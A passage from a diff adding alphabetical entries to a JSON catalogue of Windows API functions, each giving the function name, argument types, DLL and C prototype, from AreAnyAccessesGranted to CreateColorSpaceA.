"DWORD", + "DWORD" + ], + "dll_name": "advapi32.dll", + "full_prototype": "BOOL AreAnyAccessesGranted( DWORD GrantedAccess,DWORD DesiredAccess );" + }, + { + "function_name": "AreFileApisANSI", + "arguments": [ + "" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL AreFileApisANSI(VOID);" + }, + { + "function_name": "ArrangeIconicWindows", + "arguments": [ + "HWND" + ], + "dll_name": "user32.dll", + "full_prototype": "UINT ArrangeIconicWindows(HWND hWnd);" + }, + { + "function_name": "AttachThreadInput", + "arguments": [ + "DWORD", + "DWORD", + "BOOL" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL AttachThreadInput( DWORD idAttach, DWORD idAttachTo, BOOL fAttach );" + }, + { + "function_name": "auxGetDevCapsA", + "arguments": [ + "UINT", + "LPAUXCAPS", + "UINT" + ], + "dll_name": "winmm.dll", + "full_prototype": "MMRESULT auxGetDevCaps(UINT uDeviceID, LPAUXCAPS lpCaps, UINT cbCaps);" + }, + { + "function_name": "auxGetNumDevs", + "arguments": [ + "" + ], + "dll_name": "winmm.dll", + "full_prototype": "UINT auxGetNumDevs(void);" + }, + { + "function_name": "BackupEventLogA", + "arguments": [ + "HANDLE", + "LPCTSTR" + ], + "dll_name": "advapi32.dll", + "full_prototype": "BOOL BackupEventLogA( HANDLE hEventLog, LPCTSTR lpBackupFileName );" + }, + { + "function_name": "BackupEventLogW", + "arguments": [ + "HANDLE", + "LPCWSTR" + ], + "dll_name": "advapi32.dll", + "full_prototype": "BOOL BackupEventLogW( HANDLE hEventLog, LPCWSTR lpBackupFileName );" + }, + { + "function_name": "BackupRead", + "arguments": [ + "HANDLE", + "LPBYTE", + "DWORD", + "LPDWORD", + "BOOL", + "BOOL", + "LPVOID" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL BackupRead( HANDLE hFile, LPBYTE lpBuffer, DWORD nNumberOfBytesToRead, LPDWORD lpNumberOfBytesRead, BOOL bAbort, BOOL bProcessSecurity, LPVOID *lpContext );" + }, + { + "function_name": "BackupSeek", + "arguments": [ + "HANDLE", + "DWORD", + "DWORD", + "LPDWORD", + "LPDWORD", + "LPVOID *" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL BackupSeek( HANDLE hFile, DWORD dwLowBytesToSeek, DWORD dwHighBytesToSeek, LPDWORD lpdwLowByteSeeked, LPDWORD lpdwHighByteSeeked, LPVOID * lpContext );" + }, + { + "function_name": "BackupWrite", + "arguments": [ + "HANDLE", + "LPBYTE", + "DWORD", + "LPDWORD", + "BOOL", + "BOOL", + "LPVOID" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL BackupWrite( HANDLE hFile, LPBYTE lpBuffer, DWORD nNumberOfBytesToWrite, LPDWORD lpNumberOfBytesWritten, BOOL bAbort, BOOL bProcessSecurity, LPVOID *lpContext );" + }, + { + "function_name": "Beep", + "arguments": [ + "UInt32", + "UInt32" + ], + "dll_name": "kernel32.dll", + "full_prototype": "bool Beep(UInt32 dwFreq, UInt32 dwDuration);" + }, + { + "function_name": "BeginDeferWindowPos", + "arguments": [ + "int" + ], + "dll_name": "user32.dll", + "full_prototype": "HDWP BeginDeferWindowPos(int nNumWindows);" + }, + { + "function_name": "BeginPaint", + "arguments": [ + "HWND", + "LPPAINTSTRUCT" + ], + "dll_name": "user32.dll", + "full_prototype": "HDC BeginPaint(HWND hwnd, LPPAINTSTRUCT lpPaint);" + }, + { + "function_name": "BeginPath", + "arguments": [ + "HDC" + ], + "dll_name": "gdi32.dll", + "full_prototype": "BOOL BeginPath(HDC hdc);" + }, + { + "function_name": "BeginUpdateResourceA", + "arguments": [ + "LPCTSTR", + "BOOL" + ], + "dll_name": "kernel32.dll", + "full_prototype": "HANDLE BeginUpdateResourceA( LPCTSTR pFileName, BOOL bDeleteExistingResources );" + }, + { + "function_name": "BeginUpdateResourceW", + "arguments": [ + "LPCWSTR", + "BOOL" + ], + "dll_name": "kernel32.dll", + "full_prototype": "HANDLE BeginUpdateResourceW(LPCWSTR pFileName,BOOL bDeleteExistingResources);" + }, + { + "function_name": "BitBlt", + "arguments": [ + "HDC", + "int", + "int", + "int", + "int", + "HDC", + "int", + "int", + "DWORD" + ], + "dll_name": "gdi32.dll", + "full_prototype": "BOOL BitBlt( HDC hdcDest, int nXDest, int nYDest, int nWidth, int nHeight, HDC hdcSrc, int nXSrc, int nYSrc, DWORD dwRop );" + }, + { + "function_name": "BlockInput", + "arguments": [ + "BOOL" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL BlockInput(BOOL fBlockIt);" + }, + { + "function_name": "BringWindowToTop", + "arguments": [ + "HWND" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL BringWindowToTop(HWND hWnd);" + }, + { + "function_name": "BroadcastSystemMessageA", + "arguments": [ + "DWORD", + "LPDWORD", + "UINT", + "WPARAM", + "LPARAM" + ], + "dll_name": "user32.dll", + "full_prototype": "long BroadcastSystemMessageA(DWORD dwFlags, LPDWORD lpdwRecipients, UINT uiMessage, WPARAM wParam, LPARAM lParam);" + }, + { + "function_name": "BroadcastSystemMessageW", + "arguments": [ + "DWORD", + "LPDWORD", + "UINT", + "WPARAM", + "LPARAM" + ], + "dll_name": "user32.dll", + "full_prototype": "long BroadcastSystemMessageW(DWORD dwFlags, LPDWORD lpdwRecipients, UINT uiMessage, WPARAM wParam, LPARAM lParam);" + }, + { + "function_name": "BuildCommDCBA", + "arguments": [ + "LPCTSTR", + "LPDCB" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL BuildCommDCBA( LPCTSTR lpDef, LPDCB lpDCB );" + }, + { + "function_name": "BuildCommDCBW", + "arguments": [ + "LPCWSTR", + "LPDCB" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL BuildCommDCBW(LPCWSTR devid, LPDCB lpdcb);" + }, + { + "function_name": "BuildCommDCBAndTimeoutsA", + "arguments": [ + "LPCTSTR", + "LPDCB", + "LPCOMMTIMEOUTS" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL BuildCommDCBAndTimeoutsA( LPCTSTR lpDef, LPDCB lpDCB, LPCOMMTIMEOUTS lpCommTimeouts );" + }, + { + "function_name": "BuildCommDCBAndTimeoutsW", + "arguments": [ + "LPCWSTR", + "LPDCB", + "LPCOMMTIMEOUTS" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL BuildCommDCBAndTimeoutsW( LPCWSTR devid, LPDCB lpdcb, LPCOMMTIMEOUTS lptimeouts );" + }, + { + "function_name": "CallMsgFilterA", + "arguments": [ + "LPMSG", + "int" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL CallMsgFilterA(LPMSG lpMsg,int nCode);" + }, + { + "function_name": "CallMsgFilterW", + "arguments": [ + "LPMSG", + "int" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL CallMsgFilterW(LPMSG lpMsg,int nCode);" + }, + { + "function_name": "CallNamedPipeA", + "arguments": [ + "LPCTSTR", + "LPVOID", + "DWORD", + "LPVOID", + "DWORD", + "LPDWORD", + "DWORD" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL CallNamedPipeA( LPCTSTR lpNamedPipeName, LPVOID lpInBuffer, DWORD nInBufferSize, LPVOID lpOutBuffer, DWORD nOutBufferSize, LPDWORD lpBytesRead, DWORD nTimeOut );" + }, + { + "function_name": "CallNamedPipeW", + "arguments": [ + "LPCWSTR", + "PVOID", + "DWORD", + "LPVOID", + "DWORD", + "PDWORD", + "DWORD" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL CallNamedPipeW( LPCWSTR lpNamedPipeName, PVOID lpInBuffer, DWORD nInBufferSize, LPVOID lpOutBuffer, DWORD nOutBufferSize, PDWORD lpBytesRead, DWORD nTimeOut );" + }, + { + "function_name": "CallNextHookEx", + "arguments": [ + "HHOOK", + "int", + "WPARAM", + "LPARAM" + ], + "dll_name": "user32.dll", + "full_prototype": "LRESULT CallNextHookEx(HHOOK hhk, int nCode, WPARAM wParam, LPARAM lParam);" + }, + { + "function_name": "CallWindowProcA", + "arguments": [ + "WNDPROC", + "HWND", + "UINT", + "WPARAM", + "LPARAM" + ], + "dll_name": "user32.dll", + "full_prototype": "LRESULT CallWindowProcA(WNDPROC lpPrevWndFunc, HWND hWnd, UINT Msg, WPARAM wParam, LPARAM lParam);" + }, + { + "function_name": "CallWindowProcW", + "arguments": [ + "WNDPROC", + "HWND", + "UINT", + "WPARAM", + "LPARAM" + ], + "dll_name": "user32.dll", + "full_prototype": "LRESULT CallWindowProcW(WNDPROC func, HWND hwnd, UINT msg, WPARAM wParam, LPARAM lParam);" + }, + { + "function_name": "CancelDC", + "arguments": [ + "HDC" + ], + "dll_name": "gdi32.dll", + "full_prototype": "BOOL CancelDC(HDC hdc);" + }, + { + "function_name": "CancelIo", + "arguments": [ + "HANDLE" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL CancelIo(HANDLE handle);" + }, + { + "function_name": "CancelWaitableTimer", + "arguments": [ + "HANDLE" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL CancelWaitableTimer(HANDLE hTimer);" + }, + { + "function_name": "CascadeWindows", + "arguments": [ + "HWND", + "UINT", + "CONST RECT *", + "UINT", + "const HWND FAR *" + ], + "dll_name": "user32.dll", + "full_prototype": "WORD CascadeWindows(HWND hwndParent, UINT wHow,CONST RECT * lpRect,UINT cKids, const HWND FAR * lpKids);" + }, + { + "function_name": "ChangeClipboardChain", + "arguments": [ + "HWND", + "HWND" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL ChangeClipboardChain(HWND hWndRemove,HWND hWndNewNext);" + }, + { + "function_name": "ChangeDisplaySettingsA", + "arguments": [ + "LPDEVMODE", + "DWORD" + ], + "dll_name": "user32.dll", + "full_prototype": "LONG ChangeDisplaySettingsA(LPDEVMODE lpDevMode, DWORD dwflags);" + }, + { + "function_name": "ChangeDisplaySettingsW", + "arguments": [ + "PDEVMODEW", + "DWORD" + ], + "dll_name": "user32.dll", + "full_prototype": "LONG ChangeDisplaySettingsW(PDEVMODEW lpDevMode, DWORD dwflags);" + }, + { + "function_name": "ChangeDisplaySettingsExA", + "arguments": [ + "LPCTSTR", + "DEVMODE", + "HWND", + "DWORD", + "LPVOID" + ], + "dll_name": "user32.dll", + "full_prototype": "LONG ChangeDisplaySettingsExA(LPCTSTR lpszDeviceName, DEVMODE *lpDevMode, HWND hwnd, DWORD dwflags, LPVOID lParam);" + }, + { + "function_name": "ChangeDisplaySettingsExW", + "arguments": [ + "LPCWSTR", + "LPDEVMODEW", + "HWND", + "DWORD", + "LPVOID" + ], + "dll_name": "user32.dll", + "full_prototype": "LONG ChangeDisplaySettingsExW(LPCWSTR lpszDeviceName, LPDEVMODEW *lpDevMode, HWND hwnd, DWORD dwflags, LPVOID lParam);" + }, + { + "function_name": "ChangeMenuA", + "arguments": [ + "HMENU", + "UINT", + "LPCSTR", + "UINT", + "UINT" + ], + "dll_name": "user32.dll", + "full_prototype": "int ChangeMenuA(HMENU hMenu, UINT wID, LPCSTR lpszNew, UINT wIDNew, UINT wChange);" + }, + { + "function_name": "ChangeMenuW", + "arguments": [ + "HMENU", + "UINT", + "LPCWSTR", + "UINT", + "UINT" + ], + "dll_name": "user32.dll", + "full_prototype": "int ChangeMenuW(HMENU hMenu, UINT wID, LPCWSTR lpszNew, UINT wIDNew, UINT wChange);" + }, + { + "function_name": "CharLowerA", + "arguments": [ + "LPTSTR" + ], + "dll_name": "user32.dll", + "full_prototype": "LPTSTR CharLowerA(LPTSTR lpsz);" + }, + { + "function_name": "CharLowerBuffA", + "arguments": [ + "LPTSTR", + "DWORD" + ], + "dll_name": "user32.dll", + "full_prototype": "DWORD CharLowerBuffA(LPTSTR lpsz, DWORD cchLength);" + }, + { + "function_name": "CharLowerBuffW", + "arguments": [ + "LPWSTR", + "DWORD" + ], + "dll_name": "user32.dll", + "full_prototype": "DWORD CharLowerBuffW(LPWSTR lpsz, DWORD cchLength);" + }, + { + "function_name": "CharLowerW", + "arguments": [ + "LPWSTR" + ], + "dll_name": "user32.dll", + "full_prototype": "LPWSTR CharLowerW(LPWSTR lpsz);" + }, + { + "function_name": "CharNextA", + "arguments": [ + "LPCTSTR" + ], + "dll_name": "user32.dll", + "full_prototype": "LPTSTR CharNextA(LPCTSTR lpsz);" + }, + { + "function_name": "CharNextExA", + "arguments": [ + "WORD", + "LPCSTR", + "DWORD" + ], + "dll_name": "user32.dll", + "full_prototype": "LPSTR CharNextExA(WORD CodePage, LPCSTR lpCurrentChar, DWORD dwFlags);" + }, + { + "function_name": "CharNextW", + "arguments": [ + "LPCWSTR" + ], + "dll_name": "user32.dll", + "full_prototype": "LPWSTR CharNextW(LPCWSTR lpsz);" + }, + { + "function_name": "CharPrevA", + "arguments": [ + "LPCTSTR", + "LPCTSTR" + ], + "dll_name": "user32.dll", + "full_prototype": "LPTSTR CharPrevA(LPCTSTR lpszStart, LPCTSTR lpszCurrent);" + }, + { + "function_name": "CharPrevExA", + "arguments": [ + "WORD", + "LPCSTR", + "LPCSTR", + "DWORD" + ], + "dll_name": "user32.dll", + "full_prototype": "LPSTR CharPrevExA(WORD CodePage, LPCSTR lpStart, LPCSTR lpCurrentChar, DWORD dwFlags);" + }, + { + "function_name": "CharPrevW", + "arguments": [ + "LPCWSTR", + "LPCWSTR" + ], + "dll_name": "user32.dll", + "full_prototype": "LPWSTR CharPrevW(LPCWSTR lpszStart, LPCWSTR lpszCurrent);" + }, + { + "function_name": "CharToOemA", + "arguments": [ + "LPCTSTR", + "LPSTR" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL CharToOemA(LPCTSTR lpszSrc, LPSTR lpszDst);" + }, + { + "function_name": "CharToOemBuffA", + "arguments": [ + "LPCTSTR", + "LPSTR", + "DWORD" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL CharToOemBuffA(LPCTSTR lpszSrc, LPSTR lpszDst, DWORD cchDstLength);" + }, + { + "function_name": "CharToOemBuffW", + "arguments": [ + "LPCWSTR", + "LPSTR", + "DWORD" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL CharToOemBuffW(LPCWSTR lpszSrc, LPSTR lpszDst, DWORD cchDstLength);" + }, + { + "function_name": "CharToOemW", + "arguments": [ + "LPCWSTR", + "LPSTR" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL CharToOemW(LPCWSTR lpszSrc, LPSTR lpszDst);" + }, + { + "function_name": "CharUpperA", + "arguments": [ + "LPTSTR" + ], + "dll_name": "user32.dll", + "full_prototype": "LPTSTR CharUpperA(LPTSTR lpsz);" + }, + { + "function_name": "CharUpperBuffA", + "arguments": [ + "LPTSTR", + "DWORD" + ], + "dll_name": "user32.dll", + "full_prototype": "DWORD CharUpperBuffA(LPTSTR lpsz, DWORD cchLength);" + }, + { + "function_name": "CharUpperBuffW", + "arguments": [ + "LPWSTR", + "DWORD" + ], + "dll_name": "user32.dll", + "full_prototype": "DWORD CharUpperBuffW(LPWSTR lpsz, DWORD cchLength);" + }, + { + "function_name": "CharUpperW", + "arguments": [ + "LPWSTR" + ], + "dll_name": "user32.dll", + "full_prototype": "LPWSTR CharUpperW(LPWSTR lpsz);" + }, + { + "function_name": "CheckColorsInGamut", + "arguments": [ + "HDC", + "LPVOID", + "LPVOID", + "DWORD" + ], + "dll_name": "gdi32.dll", + "full_prototype": "BOOL CheckColorsInGamut(HDC hdc, LPVOID lpaRGBQuad, LPVOID lpResult, DWORD nCount);" + }, + { + "function_name": "CheckDlgButton", + "arguments": [ + "HWND", + "int", + "UINT" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL CheckDlgButton(HWND hDlg, int nIDButton, UINT uCheck);" + }, + { + "function_name": "CheckMenuItem", + "arguments": [ + "HMENU", + "UINT", + "UINT" + ], + "dll_name": "user32.dll", + "full_prototype": "DWORD CheckMenuItem(HMENU hmenu, UINT uIDCheckItem, UINT uCheck);" + }, + { + "function_name": "CheckMenuRadioItem", + "arguments": [ + "HMENU", + "UINT", + "UINT", + "UINT", + "UINT" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL CheckMenuRadioItem(HMENU hmenu, UINT idFirst, UINT idLast, UINT idCheck, UINT uFlags);" + }, + { + "function_name": "CheckRadioButton", + "arguments": [ + "HWND", + "int", + "int", + "int" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL CheckRadioButton(HWND hDlg, int nIDFirstButton, int nIDLastButton, int nIDCheckButton);" + }, + { + "function_name": "ChildWindowFromPoint", + "arguments": [ + "HWND", + "POINT" + ], + "dll_name": "user32.dll", + "full_prototype": "HWND ChildWindowFromPoint(HWND hWndParent, POINT Point);" + }, + { + "function_name": "ChildWindowFromPointEx", + "arguments": [ + "HWND", + "POINT", + "UINT" + ], + "dll_name": "user32.dll", + "full_prototype": "HWND ChildWindowFromPointEx(HWND hwndParent, POINT pt, UINT uFlags);" + }, + { + "function_name": "ChooseColorA", + "arguments": [ + "LPCHOOSECOLOR" + ], + "dll_name": "comdlg32.dll", + "full_prototype": "BOOL ChooseColorA(LPCHOOSECOLOR lpcc);" + }, + { + "function_name": "ChooseFontA", + "arguments": [ + "LPCHOOSEFONT" + ], + "dll_name": "comdlg32.dll", + "full_prototype": "BOOL ChooseFontA(LPCHOOSEFONT lpcf);" + }, + { + "function_name": "ChoosePixelFormat", + "arguments": [ + "HDC", + "const PIXELFORMATDESCRIPTOR" + ], + "dll_name": "gdi32.dll", + "full_prototype": "int ChoosePixelFormat(HDC hdc, const PIXELFORMATDESCRIPTOR *ppfd);" + }, + { + "function_name": "Chord", + "arguments": [ + "HDC", + "int", + "int", + "int", + "int", + "int", + "int", + "int", + "int" + ], + "dll_name": "gdi32.dll", + "full_prototype": "BOOL Chord(HDC hdc, int nLeftRect, int nTopRect, int nRightRect, int nBottomRect, int nXRadial1, int nYRadial1, int nXRadial2, int nYRadial2);" + }, + { + "function_name": "ClearCommBreak", + "arguments": [ + "HANDLE" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL ClearCommBreak(HANDLE hFile);" + }, + { + "function_name": "ClearCommError", + "arguments": [ + "HANDLE", + "LPDWORD", + "LPCOMSTAT" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL ClearCommError( HANDLE hFile, LPDWORD lpErrors, LPCOMSTAT lpStat );" + }, + { + "function_name": "ClearEventLogA", + "arguments": [ + "HANDLE", + "LPCTSTR" + ], + "dll_name": "advapi32.dll", + "full_prototype": "BOOL ClearEventLogA( HANDLE hEventLog, LPCTSTR lpBackupFileName );" + }, + { + "function_name": "ClearEventLogW", + "arguments": [ + "HANDLE", + "LPCWSTR" + ], + "dll_name": "advapi32.dll", + "full_prototype": "BOOL ClearEventLogW( HANDLE hEventLog, LPCWSTR lpBackupFileName );" + }, + { + "function_name": "ClientToScreen", + "arguments": [ + "HWND", + "LPPOINT" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL ClientToScreen(HWND hWnd,LPPOINT lpPoint);" + }, + { + "function_name": "ClipCursor", + "arguments": [ + "CONST RECT *" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL ClipCursor(CONST RECT * lpRect);" + }, + { + "function_name": "CloseClipboard", + "arguments": [ + "" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL CloseClipboard(VOID);" + }, + { + "function_name": "CloseDesktop", + "arguments": [ + "HDESK" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL CloseDesktop(HDESK hDesktop);" + }, + { + "function_name": "CloseEnhMetaFile", + "arguments": [ + "HDC" + ], + "dll_name": "gdi32.dll", + "full_prototype": "HENHMETAFILE CloseEnhMetaFile(HDC hdc);" + }, + { + "function_name": "CloseEventLog", + "arguments": [ + "HANDLE" + ], + "dll_name": "advapi32.dll", + "full_prototype": "BOOL CloseEventLog(HANDLE hEventLog);" + }, + { + "function_name": "CloseFigure", + "arguments": [ + "HDC" + ], + "dll_name": "gdi32.dll", + "full_prototype": "BOOL CloseFigure(HDC hdc);" + }, + { + "function_name": "CloseHandle", + "arguments": [ + "HANDLE" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL CloseHandle(HANDLE hObject);" + }, + { + "function_name": "CloseMetaFile", + "arguments": [ + "HDC" + ], + "dll_name": "gdi32.dll", + "full_prototype": "HMETAFILE CloseMetaFile(HDC hdc);" + }, + { + "function_name": "ClosePrinter", + "arguments": [ + "HANDLE" + ], + "dll_name": "winspool.drv", + "full_prototype": "BOOL ClosePrinter(HANDLE hPrinter);" + }, + { + "function_name": "CloseWindow", + "arguments": [ + "HWND" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL CloseWindow(HWND hWnd);" + }, + { + "function_name": "CloseWindowStation", + "arguments": [ + "HWINSTA" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL CloseWindowStation(HWINSTA hWinSta);" + }, + { + "function_name": "CoCreateGuid", + "arguments": [ + "GUID *" + ], + "dll_name": "ole32.dll", + "full_prototype": "HRESULT CoCreateGuid(GUID * pguid);" + }, + { + "function_name": "ColorMatchToTarget", + "arguments": [ + "HDC", + "HDC", + "DWORD" + ], + "dll_name": "gdi32.dll", + "full_prototype": "BOOL ColorMatchToTarget(HDC hdc, HDC hdcTarget, DWORD uiAction);" + }, + { + "function_name": "CombineRgn", + "arguments": [ + "HRGN", + "HRGN", + "HRGN", + "int" + ], + "dll_name": "gdi32.dll", + "full_prototype": "int CombineRgn(HRGN hrgnDest, HRGN hrgnSrc1, HRGN hrgnSrc2, int fnCombineMode);" + }, + { + "function_name": "CombineTransform", + "arguments": [ + "LPXFORM", + "const XFORM", + "const XFORM" + ], + "dll_name": "gdi32.dll", + "full_prototype": "BOOL CombineTransform(LPXFORM lpxformResult, const XFORM *lpxform1, const XFORM *lpxform2);" + }, + { + "function_name": "CommConfigDialogA", + "arguments": [ + "LPTSTR", + "HWND", + "LPCOMMCONFIG", + "" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL CommConfigDialogA( LPTSTR lpszName, HWND hWnd, LPCOMMCONFIG lpCC, );" + }, + { + "function_name": "CommConfigDialogW", + "arguments": [ + "LPCWSTR", + "HWND", + "LPCOMMCONFIG" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL CommConfigDialogW( LPCWSTR lpszDevice, HWND hWnd, LPCOMMCONFIG lpCommConfig );" + }, + { + "function_name": "CompareFileTime", + "arguments": [ + "CONST FILETIME", + "CONST FILETIME" + ], + "dll_name": "kernel32.dll", + "full_prototype": "LONG CompareFileTime( CONST FILETIME *lpFileTime1, CONST FILETIME *lpFileTime2 );" + }, + { + "function_name": "CompareStringA", + "arguments": [ + "LCID", + "DWORD", + "LPCTSTR", + "int", + "LPCTSTR", + "int" + ], + "dll_name": "kernel32.dll", + "full_prototype": "int CompareStringA(LCID Locale, DWORD dwCmpFlags, LPCTSTR lpString1, int cchCount1, LPCTSTR lpString2, int cchCount2 );" + }, + { + "function_name": "CompareStringW", + "arguments": [ + "LCID", + "DWORD", + "LPCWSTR", + "INT", + "LPCWSTR", + "INT" + ], + "dll_name": "kernel32.dll", + "full_prototype": "INT CompareStringW( LCID lcid, DWORD style, LPCWSTR str1, INT len1, LPCWSTR str2, INT len2 );" + }, + { + "function_name": "ConfigurePortA", + "arguments": [ + "LPTSTR", + "HWND", + "LPTSTR" + ], + "dll_name": "winspool.drv", + "full_prototype": "BOOL ConfigurePortA(LPTSTR pName,HWND hWnd,LPTSTR pPortName);" + }, + { + "function_name": "ConnectNamedPipe", + "arguments": [ + "HANDLE", + "LPOVERLAPPED" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL ConnectNamedPipe( HANDLE hNamedPipe, LPOVERLAPPED lpOverlapped );" + }, + { + "function_name": "ContinueDebugEvent", + "arguments": [ + "DWORD", + "DWORD", + "DWORD" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL ContinueDebugEvent( DWORD dwProcessId, DWORD dwThreadId, DWORD dwContinueStatus );" + }, + { + "function_name": "ConvertDefaultLocale", + "arguments": [ + "LCID" + ], + "dll_name": "kernel32.dll", + "full_prototype": "LCID ConvertDefaultLocale(LCID Locale);" + }, + { + "function_name": "ConvertThreadToFiber", + "arguments": [ + "LPVOID" + ], + "dll_name": "kernel32.dll", + "full_prototype": "LPVOID ConvertThreadToFiber(LPVOID lpParameter);" + }, + { + "function_name": "CopyAcceleratorTableA", + "arguments": [ + "HACCEL", + "LPACCEL", + "int" + ], + "dll_name": "user32.dll", + "full_prototype": "int CopyAcceleratorTableA(HACCEL hAccelSrc, LPACCEL lpAccelDst, int cAccelEntries);" + }, + { + "function_name": "CopyAcceleratorTableW", + "arguments": [ + "HACCEL", + "LPACCEL", + "int" + ], + "dll_name": "user32.dll", + "full_prototype": "int CopyAcceleratorTableW(HACCEL hAccelSrc, LPACCEL lpAccelDst, int cAccelEntries);" + }, + { + "function_name": "CopyEnhMetaFileA", + "arguments": [ + "HENHMETAFILE", + "LPCTSTR" + ], + "dll_name": "gdi32.dll", + "full_prototype": "HENHMETAFILE CopyEnhMetaFileA(HENHMETAFILE hemfSrc, LPCTSTR lpszFile);" + }, + { + "function_name": "CopyEnhMetaFileW", + "arguments": [ + "HENHMETAFILE", + "LPCWSTR" + ], + "dll_name": "gdi32.dll", + "full_prototype": "HENHMETAFILE CopyEnhMetaFileW(HENHMETAFILE hmfSrc, LPCWSTR file);" + }, + { + "function_name": "CopyFileA", + "arguments": [ + "LPCTSTR", + "LPCTSTR", + "BOOL" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL CopyFileA(LPCTSTR lpExistingFileName,LPCTSTR lpNewFileName,BOOL bFailIfExists);" + }, + { + "function_name": "CopyFileExA", + "arguments": [ + "LPCSTR", + "LPCSTR", + "LPPROGRESS_ROUTINE", + "LPVOID", + "LPBOOL", + "DWORD" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL CopyFileExA(LPCSTR lpExistingFileName, LPCSTR lpNewFileName, LPPROGRESS_ROUTINE lpProgressRoutine, LPVOID lpData, LPBOOL pbCancel, DWORD dwCopyFlags);" + }, + { + "function_name": "CopyFileExW", + "arguments": [ + "LPCWSTR", + "LPCWSTR", + "LPPROGRESS_ROUTINE", + "LPVOID", + "LPBOOL", + "DWORD" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL CopyFileExW(LPCWSTR lpExistingFileName, LPCWSTR lpNewFileName, LPPROGRESS_ROUTINE lpProgressRoutine, LPVOID lpData, LPBOOL pbCancel, DWORD dwCopyFlags);" + }, + { + "function_name": "CopyFileW", + "arguments": [ + "WCHAR", + "WCHAR", + "BOOL" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL CopyFileW( WCHAR *from, WCHAR *to, BOOL bFailIfExists);" + }, + { + "function_name": "CopyIcon", + "arguments": [ + "HICON" + ], + "dll_name": "user32.dll", + "full_prototype": "HICON CopyIcon(HICON hIcon);" + }, + { + "function_name": "CopyImage", + "arguments": [ + "HANDLE", + "UINT", + "int", + "int", + "UINT" + ], + "dll_name": "user32.dll", + "full_prototype": "HANDLE CopyImage(HANDLE hImage, UINT uType,int cxDesired, int cyDesired,UINT fuFlags);" + }, + { + "function_name": "CopyMetaFileA", + "arguments": [ + "HMETAFILE", + "LPCTSTR" + ], + "dll_name": "gdi32.dll", + "full_prototype": "HMETAFILE CopyMetaFileA(HMETAFILE hmfSrc, LPCTSTR lpszFile);" + }, + { + "function_name": "CopyMetaFileW", + "arguments": [ + "HMETAFILE", + "LPCWSTR" + ], + "dll_name": "gdi32.dll", + "full_prototype": "HMETAFILE CopyMetaFileW(HMETAFILE hSrcMetaFile, LPCWSTR lpFilename);" + }, + { + "function_name": "CopyRect", + "arguments": [ + "LPRECT", + "CONST RECT" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL CopyRect(LPRECT lprcDst, CONST RECT *lprcSrc);" + }, + { + "function_name": "CopySid", + "arguments": [ + "DWORD", + "PSID", + "PSID" + ], + "dll_name": "advapi32.dll", + "full_prototype": "BOOL CopySid( DWORD nDestinationSidLength, PSID pDestinationSid, PSID pSourceSid );" + }, + { + "function_name": "CountClipboardFormats", + "arguments": [ + "" + ], + "dll_name": "user32.dll", + "full_prototype": "int CountClipboardFormats(VOID);" + }, + { + "function_name": "CreateAcceleratorTableA", + "arguments": [ + "LPACCEL", + "int" + ], + "dll_name": "user32.dll", + "full_prototype": "HACCEL CreateAcceleratorTableA(LPACCEL lpaccl,int cEntries);" + }, + { + "function_name": "CreateAcceleratorTableW", + "arguments": [ + "LPACCEL", + "int" + ], + "dll_name": "user32.dll", + "full_prototype": "HACCEL CreateAcceleratorTableW(LPACCEL lpaccl,int cEntries);" + }, + { + "function_name": "CreateBitmap", + "arguments": [ + "int", + "int", + "UINT", + "UINT", + "const void" + ], + "dll_name": "gdi32.dll", + "full_prototype": "HBITMAP CreateBitmap(int nWidth, int nHeight, UINT cPlanes, UINT cBitsPerPel, const void *lpvBits);" + }, + { + "function_name": "CreateBitmapIndirect", + "arguments": [ + "CONST BITMAP" + ], + "dll_name": "gdi32.dll", + "full_prototype": "HBITMAP CreateBitmapIndirect(CONST BITMAP *lpbm);" + }, + { + "function_name": "CreateBrushIndirect", + "arguments": [ + "CONST LOGBRUSH *" + ], + "dll_name": "gdi32.dll", + "full_prototype": "HBRUSH CreateBrushIndirect(CONST LOGBRUSH * lplb);" + }, + { + "function_name": "CreateCaret", + "arguments": [ + "HWND", + "HBITMAP", + "int", + "int" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL CreateCaret(HWND hWnd, HBITMAP hBitmap, int nWidth, int nHeight);" + }, + { + "function_name": "CreateColorSpaceA", + "arguments": [ + "LPLOGCOLORSPACE" 